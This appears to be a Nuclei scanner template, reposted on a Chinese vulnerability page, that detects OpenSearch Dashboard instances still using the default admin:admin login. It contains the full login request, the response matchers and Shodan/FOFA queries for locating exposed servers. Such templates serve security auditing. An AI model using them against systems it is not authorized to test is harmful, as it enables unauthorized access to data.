漏洞描述
OpenSearch Dashboard is a community-driven, open source search and analytics suite. This template detects instances using default credentials (admin:admin).
opensearch-dashboard-default-login: OpenSearch Dashboard - Default Login
PoC代码[已公开]
id: opensearch-dashboard-default-login
info:
name: OpenSearch Dashboard - Default Login
author: ritikchaddha
severity: high
description: |
OpenSearch Dashboard is a community-driven, open source search and analytics suite. This template detects instances using default credentials (admin:admin).
reference:
- https://opensearch.org/docs/latest/security/access-control/users-roles/
- https://github.com/opensearch-project/OpenSearch-Dashboards
metadata:
verified: true
max-request: 1
shodan-query: title:"OpenSearch"
fofa-query: title="OpenSearch"
tags: opensearch,default-login,misconfig,vuln
variables:
username: admin
password: admin
http:
- raw:
- |
POST /auth/login HTTP/1.1
Host: {{Hostname}}
osd-xsrf: osd-fetch
Content-Type: application/json
{"username":"{{username}}","password":"{{password}}"}
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains_all(body, "username\":", "roles\":")'
- 'contains(content_type, "application/json")'
condition: and
# digest: 4a0a00473045022008ef4d5f2dadfb63c16a8c38c5da1dd646d56e9c2c42888e917ffbb2b03b089d0221009fdf7532c722b8e49b77f3eea64b6101ffeb795a2d0b5ed11ababea3c6c09769:922c64590222798bb761d5b6d8e72950